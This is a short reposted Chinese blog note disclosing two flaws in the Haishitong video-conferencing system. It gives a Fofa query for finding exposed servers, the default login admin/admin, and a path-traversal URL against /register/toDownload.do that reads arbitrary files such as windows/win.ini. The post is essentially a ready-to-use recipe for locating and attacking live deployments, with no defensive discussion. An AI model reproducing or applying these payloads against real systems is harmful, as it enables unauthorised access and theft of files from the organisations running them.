好视通-视频会议存在弱口令&任意文件下载漏洞
生活随笔
收集整理的這篇文章主要介紹了
好视通-视频会议存在弱口令&任意文件下载漏洞
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
描述
系統存在弱口令和任意文件下載漏洞
Fofa
app="好視通-視頻會議"
弱口令
POC
admin/admin
登錄界面
登錄成功
任意文件下載
POC
/register/toDownload.do?fileName=敏感文件路徑
(https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini)
參考
https://www.adminxe.com/2228.html
總結
以上是生活随笔為你收集整理的好视通-视频会议存在弱口令&任意文件下载漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 剑指offer(65)矩阵中的路径
- 下一篇: openshift scc解析